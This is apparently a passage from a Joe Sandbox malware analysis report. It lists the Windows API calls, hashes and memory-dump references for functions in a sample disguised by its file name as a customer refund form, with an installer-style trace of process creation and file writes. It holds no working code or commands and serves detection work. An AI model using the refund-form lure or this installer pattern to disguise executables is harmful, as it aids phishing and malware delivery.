                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Create
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                      • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                      • Instruction ID: dcb86bc894ab99bc20e37dc8a6176b737b641c0fdee4176656c7f25b47436c56
                                                                                                                                      • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                      • Instruction Fuzzy Hash: 75E0E6B2110109BEEF195F50DD0AD7B375DE704304F01452EFA06D4091E6B5AD315634
                                                                                                                                      Function 00405E62 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032FA,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E76
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                      • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                      • Instruction ID: 8754e0b6f25d564075f0081c534dd79b85a2df0f0bc88b3642164a4a3ec1e455
                                                                                                                                      • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                      • Instruction Fuzzy Hash: FDE0B63221065AAFDF109F95DC00AAB7B6CEB052A0F044437FD59E7150D671EA21DAE4
                                                                                                                                      Function 00405E33 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403344,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E47
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileRead
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                      • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                      • Instruction ID: bd732019988057c431ec21c3a2c50b1292625b962aa4d7912315599e48db2a91
                                                                                                                                      • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                      • Instruction Fuzzy Hash: A9E08C3220021AABCF20AF54DC00FEB3B6CEB05760F004832FD65E6040E230EA219BE8
                                                                                                                                      Function 0040427D Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SendMessageW.USER32(00010404,00000000,00000000,00000000), ref: 0040428F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                      • Opcode ID: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
                                                                                                                                      • Instruction ID: 5c868bdd594fc053bdde718b2d54d3bc7308835e7239c12b28f3ea995dd83e98
                                                                                                                                      • Opcode Fuzzy Hash: 044c555184de4d7a5f175320e579115887058accaecda6f3071fa169e0c3e565
                                                                                                                                      • Instruction Fuzzy Hash: 3EC09BB27443007BDE118F909D49F1777545790741F18447D7344F51E0D674D450D61C
                                                                                                                                      Function 00403347 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403355
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FilePointer
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 973152223-0
                                                                                                                                      • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                      • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                                      • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                                      • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                                      Function 00404266 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3850602802-0
                                                                                                                                      • Opcode ID: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                                                                                                      • Instruction ID: 35ea918b965a0e533a09ef3704f79fc1997eb74e27ad0e26ff3c84f6d98ddf78
                                                                                                                                      • Opcode Fuzzy Hash: c67af3d44b601b412ad7c6a67ff551ecd195e7fe17a35a24dfb0ddc2ffe3d870
                                                                                                                                      • Instruction Fuzzy Hash: ACB0923A180600AADE118B40DE4AF857A62F7A4701F018138B240640B0CAB200E0DB48
                                                                                                                                      Function 004058E6 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • ShellExecuteExW.SHELL32(?), ref: 004058F5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExecuteShell
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 587946157-0
                                                                                                                                      • Opcode ID: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                                                                                                      • Instruction ID: 322818d701d9cc3fc85427ca8463de8bac6637280c84b784c1803e53dd53602d
                                                                                                                                      • Opcode Fuzzy Hash: 635164c3b06ed96bf07ad63cc2cf624e21a1ddaff933affe27173adac056c9f0
                                                                                                                                      • Instruction Fuzzy Hash: 55C092B2000200DFE301CF90CB08F067BF8AF59306F028058E1849A160C7788800CB69
                                                                                                                                      Function 00404253 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,0040402A), ref: 0040425D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CallbackDispatcherUser
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2492992576-0
                                                                                                                                      • Opcode ID: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
                                                                                                                                      • Instruction ID: 53e6378d439adf7425634a45181eb817498d90fd80a7d40cc762234469e1412e
                                                                                                                                      • Opcode Fuzzy Hash: 106f9cbea43f495b3a7615003be81b6b7a77907888ddc1815467e3f395259461
                                                                                                                                      • Instruction Fuzzy Hash: C5A00275544501DBCE115B50DF058057A61F7E47017514479A5555103486714461EB19
                                                                                                                                      Function 00401F06 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00405322: lstrlenW.KERNEL32(Completed,00000000,0041E411,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                        • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Completed,00000000,0041E411,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                        • Part of subcall function 00405322: lstrcatW.KERNEL32(Completed,0040327A,0040327A,Completed,00000000,0041E411,771B23A0), ref: 0040537D
                                                                                                                                        • Part of subcall function 00405322: SetWindowTextW.USER32(Completed,Completed), ref: 0040538F
                                                                                                                                        • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                        • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                        • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                        • Part of subcall function 004058A3: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                                                                                                                        • Part of subcall function 004058A3: CloseHandle.KERNEL32(?), ref: 004058D9
                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F4D
                                                                                                                                        • Part of subcall function 00406745: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406756
                                                                                                                                        • Part of subcall function 00406745: GetExitCodeProcess.KERNEL32(?,?), ref: 00406778
                                                                                                                                        • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2972824698-0
                                                                                                                                      • Opcode ID: 5a28121f2258d33dec22efc4f0f8398db0f945c4b774a67d481a18083085a5c0
                                                                                                                                      • Instruction ID: 9073c6adce58ff193a4fc3832a7f1d33e0b572ffc6e746f3319226a0f770ccba
                                                                                                                                      • Opcode Fuzzy Hash: 5a28121f2258d33dec22efc4f0f8398db0f945c4b774a67d481a18083085a5c0
                                                                                                                                      • Instruction Fuzzy Hash: 24F0F0329090219BDB20FBA189885DE72A49F44318B2441BBF902B20D1CBBC0E409A6E

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 00404C9E Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 00404CB6
                                                                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404CC1
                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D0B
                                                                                                                                      • LoadBitmapW.USER32(0000006E), ref: 00404D1E
                                                                                                                                      • SetWindowLongW.USER32(?,000000FC,00405296), ref: 00404D37
                                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D4B
                                                                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D5D
                                                                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404D73
                                                                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D7F
                                                                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D91
                                                                                                                                      • DeleteObject.GDI32(00000000), ref: 00404D94
                                                                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404DBF
                                                                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404DCB
                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E61
                                                                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E8C
                                                                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404EA0
                                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404ECF
                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EDD
                                                                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404EEE
                                                                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FEB
                                                                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00405050
                                                                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405065
                                                                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405089
                                                                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004050A9
                                                                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 004050BE
                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 004050CE
                                                                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405147
                                                                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 004051F0
                                                                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051FF
                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0040521F
                                                                                                                                      • ShowWindow.USER32(?,00000000), ref: 0040526D
                                                                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00405278
                                                                                                                                      • ShowWindow.USER32(00000000), ref: 0040527F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1289247116.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1289223366.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289268198.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289286815.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1289449803.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                      • String ID: $M$N
                                                                                                                                      • API String ID: 1638840714-813528018
                                                                                                                                      • Opcode ID: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                                                                                                                      • Instruction ID: f888d98cc81d7f01a919363da6f821789f230268a52e2f70c0503caf05bd5b25
                                                                                                                                      • Opcode Fuzzy Hash: d7fb2f4892de50fbc14c1a930a22a2945486bdf273952240de52388985094c93
                                                                                                                                      • Instruction Fuzzy Hash: BB026FB0900209EFDB109FA4DD85AAE7BB5FB84314F14857AF610BA2E0C7799D52CF58
                                                                                                                                      Function 00404722 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                                                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                                                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                                                                                                                      • lstrcmpiW.KERNEL32(: Completed,0042D248,00000000,?,?), ref: 00404889
                                                                                                                                      • lstrcatW.KERNEL32(?,: Completed), ref: 00404895
                                                                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                                                                                                                        • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,00000400,004048DE), ref: 00405917
                                                                                                                                        • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe",0040336A,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                        • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                        • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe",0040336A,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                        • Part of subcall function 0040654E: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe",0040336A,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                      • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040496A
                                                                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                                                                                                                        • Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                        • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                                                                                                                        • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
